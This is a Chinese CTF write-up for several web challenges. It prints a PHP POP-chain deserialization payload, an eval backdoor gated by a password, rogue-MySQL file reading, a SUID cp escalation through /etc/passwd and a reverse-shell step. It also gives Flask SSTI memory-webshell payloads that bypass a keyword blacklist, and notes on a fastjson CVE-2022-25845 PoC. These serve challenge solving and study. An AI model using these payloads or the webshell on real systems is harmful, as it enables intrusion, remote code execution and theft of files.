web
ezpop
反序列化、浅拷贝
<?php
// Challenge source as given (ezpop). All warnings/notices are silenced, so undefined
// property or undefined array key problems in the gadget classes below never surface.
error_reporting(0);

// File-read sink reachable through __call: any call to an undefined method on a
// DayDay instance runs execute(). The application never instantiates this class
// itself; an instance can only appear through unserialize() (see the bottom of the file).
class DayDay{
    public $secret;   // overwritten with a fresh md5(mt_rand()) on every execute()
    public $password; // compared with $secret; attacker-controlled after unserialize()
    public $filename; // passed verbatim to file_get_contents() — no path restriction at all
    // __call: fires for any undefined method name; both arguments are ignored.
    public function __call($arg1,$arg2) { $this->execute(); }
    // execute: regenerates $secret, then echoes the contents of $filename only when
    // $password === $secret. The value cannot be guessed, but the check is not a
    // defense: unserialize() preserves references between properties, so serialized
    // data can make $password and $secret the same variable (the R: reference in the
    // payload on this page does that). mt_rand() is also not a CSPRNG.
    private function execute(){
        $this->secret=md5(mt_rand());
        if($this->password===$this->secret){
            echo file_get_contents($this->filename);
        }else{
            echo "Hacker !!!";
        }
    }
}
/**
 * Wrapper around an arbitrary object ($hahah) that forwards property reads and can
 * be coerced to string. Both magic methods act on *other* objects, which is what lets
 * unserialize() chain this class together with the other classes in this file.
 */
class five {
    protected $hahah; // set only by the constructor, or by unserialize()
    // Runs on a read of an inaccessible/undeclared property: it first WRITES "Nero"
    // to the same-named property of $hahah (if that property is inaccessible on
    // $hahah, that class's __set runs — Music::__set in this file, for example) and
    // then reads it back and returns whatever comes out.
    public function __get($arg){ $this->hahah->$arg="Nero"; return $this->hahah->$arg; }
    // String conversion reads $this->NoNO, which this class does not declare, so the
    // read goes through __get above.
    public function __toString(){ return $this->NoNO; }
    public function __construct($obj) { $this->hahah=$obj; }
}
/**
 * Callable wrapper: using an FFFF instance as a function calls sihasia() on $four.
 * No class in this file defines sihasia(), so on these classes the call lands in
 * __call where one exists (DayDay::__call) and is a fatal Error otherwise.
 */
class FFFF {
    public $four; // whatever object (or value) the serialized data supplies
    public function __invoke(){ $this->four->sihasia(); }
}
/**
 * Class whose only behaviour is in __set: writing an undeclared/inaccessible
 * property on a Music instance calls whatever $a holds (function name string,
 * closure, or invokable object) with no arguments and returns its result.
 * $name and $info are ignored. With the default '' the call fails.
 */
class Music{
    public $Tech;
    public $a='';

    public function __set($name,$info) {
        // Copy first so that $a is resolved once, then invoke it.
        $target = $this->a;
        return $target();
    }
}
/**
 * Greeter whose destructor prints a line that embeds $hello. Because string
 * conversion of $hello happens in __destruct, any object stored in $hello has its
 * __toString() invoked when the instance is released — including at the end of
 * unserialize() handling.
 */
class Hello{
    public $hello;

    public function __construct() {
        $this->hello = "Six G0d";
    }

    /** Echoes the greeting; $hello is interpolated (string conversion applies). */
    public function _SayGo() {
        echo "Do you like{$this->hello}?";
    }

    public function __destruct() {
        $this->_SayGo();
    }
}
function filter($string) { $filter='/flag/i'; return preg_replace($filter,"",$string); }
$poc=$_GET['poc']; if(isset($poc)){ show_source(__FILE__); unserialize(filter($poc)); }else{ show_source(__FILE__); }
|
payload:
O%3A5%3A%22Hello%22%3A1%3A%7Bs%3A5%3A%22hello%22%3BO%3A4%3A%22five%22%3A1%3A%7Bs%3A5%3A%22hahah%22%3BO%3A5%3A%22Music%22%3A2%3A%7Bs%3A4%3A%22Tech%22%3BN%3Bs%3A1%3A%22a%22%3BO%3A4%3A%22FFFF%22%3A1%3A%7Bs%3A4%3A%22four%22%3BO%3A6%3A%22DayDay%22%3A3%3A%7Bs%3A6%3A%22secret%22%3BN%3Bs%3A8%3A%22password%22%3BR%3A7%3Bs%3A8%3A%22filename%22%3Bs%3A5%3A%22%2Fflflagag%22%3B%7D%7D%7D%7D%7D
O:5:"Hello":1:{s:5:"hello";O:4:"five":1:{s:5:"hahah";O:5:"Music":2:{s:4:"Tech";N;s:1:"a";O:4:"FFFF":1:{s:4:"four";O:6:"DayDay":3:{s:6:"secret";N;s:8:"password";R:7;s:8:"filename";s:5:"/flflagag";}}}}}
|
mysecret
<?php
highlight_file(__FILE__);

/**
 * Holds MySQL connection settings and opens a connection in __wakeup().
 * Because __wakeup() runs on every unserialize() of this class, the host,
 * credentials and database name used for the outbound connection come from
 * whatever serialized data is being restored; $host is never validated or pinned.
 */
class DB{
    public $host;
    public $username;
    public $password;
    public $dbname;

    public function __construct($host, $username, $password, $dbname){
        $this->host = $host;
        $this->username = $username;
        $this->password = $password;
        $this->dbname = $dbname;
    }

    /** Runs on unserialize(): connects immediately and echoes the outcome. */
    public function __wakeup() {
        echo $this->link();
    }

    /**
     * Opens a mysqli connection to $host with the stored credentials, selects
     * $dbname, sets the connection charset, closes, and reports "Success";
     * a failed connection reports "Fail".
     */
    public function link(){
        $connection = new mysqli( $this->host, $this->username, $this->password );
        if ($connection->connect_error) {
            return "Fail";
        }
        $connection->select_db($this->dbname);
        $connection->query("SET NAMES utf8");
        mysqli_close($connection);
        return "Success";
    }
}
// Deserializes request data with errors suppressed (@). Restoring a DB object
// runs DB::__wakeup() and therefore an outbound MySQL connection to whatever host
// the request supplied. SECURITY: unserialize() on $_GET is the entry point of
// this challenge; real code would json_decode() or pass ['allowed_classes' => false].
@unserialize($_GET['data']);
// Hard-coded credential gate in front of eval() on a POST field: whoever knows the
// pre-image of this SHA-1 gets arbitrary code execution. This is a backdoor, not an
// authentication mechanism (unsalted, fast hash; secret compared with a constant).
if(isset($_GET['pass']) && sha1($_GET['pass']) === "2e59e260ed970274a5b077635a81c88c3ce9356c"){
    eval($_POST['backdoor']);
}
?>
|
公网ip服务器上运行那个py, 反序列化那里就正常填ip, root, 密码和数据库名为空; 把py文件里面的/etc/passwd改成/hint就行
反序列化
<?php
/**
 * Copy of the challenge's DB class, kept here so serialize() produces the same
 * class name and property layout as the target. __wakeup() opens a connection on
 * unserialize() using whatever host/credentials the serialized data carries.
 */
class DB{
    public $host;
    public $username;
    public $password;
    public $dbname;

    public function __construct($host, $username, $password, $dbname){
        $this->host = $host;
        $this->username = $username;
        $this->password = $password;
        $this->dbname = $dbname;
    }

    /** Runs on unserialize(): connects immediately and echoes the outcome. */
    public function __wakeup() {
        echo $this->link();
    }

    /**
     * Opens a mysqli connection to $host with the stored credentials, selects
     * $dbname, sets the connection charset, closes, and reports "Success";
     * a failed connection reports "Fail".
     */
    public function link(){
        $connection = new mysqli( $this->host, $this->username, $this->password );
        if ($connection->connect_error) {
            return "Fail";
        }
        $connection->select_db($this->dbname);
        $connection->query("SET NAMES utf8");
        mysqli_close($connection);
        return "Success";
    }
}
$a = new DB('ip','root','',''); echo serialize($a);
|
hint里面是密码:
rs297ns9s2930003nn29ss55789ss0sn
|
蚁剑连接:
# URL地址: http://e1c3e1fc72887e91.node.nsctf.cn/?pass=rs297ns9s2930003nn29ss55789ss0sn # 密码: backdoor
|
cp有SUID权限, 将/etc/passwd
复制下来, 在最后添加新的用户
msf生成php反弹木马, 弹出来即可连接, 然后su切换新的用户, 即可读取flag
Memory
python flask 内存马
给的waf.py
文件:
import random blacklist=[ '_', 'class', 'base', 'mro', 'subclasses', '.', '[', ']', '{%', "'", '"', 'request', 'cookie', 'values', 'url_for', 'config', 'builtins', 'globals', 'init', '\\x', 'attr', 'getitem', 'string', 'list', 'select', 'pop', 'print', 'set', '{{', 'join', 'count','app','os',"import","modules","dict","sys" ] def waf(s): evilcode= random.sample(blacklist,10) if not s.isascii(): return False else: for key in evilcode: if key in s: return True return False
|
网站的/hint
文件
if method=="POST": template = request.form.get("code") if waf(template): return "Hacker Found" result = render_template_string(template)
|
原始内存马:
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
|
变形payload:
request.application
request.application.__self__._get_data_for_json.__getattribute__('__globa'+'ls__').__getitem__('__bui'+'ltins__').__getitem__('ex'+'ec')("app.add_url_rule('/h3rmesk1t', 'h3rmesk1t', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('shell', 'calc')).read())",{'_request_ct'+'x_stack':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('_request_'+'ctx_stack'),'app':get_flashed_messages.__getattribute__('__globa'+'ls__').pop('curre'+'nt_app')})
|
json
CVE-2022-25845
直接改poc.java文件
static String target = "http://7dcef4ada4bd5d44.node.nsctf.cn/json"; static String file = "file:///flag";
|
跑poc即可
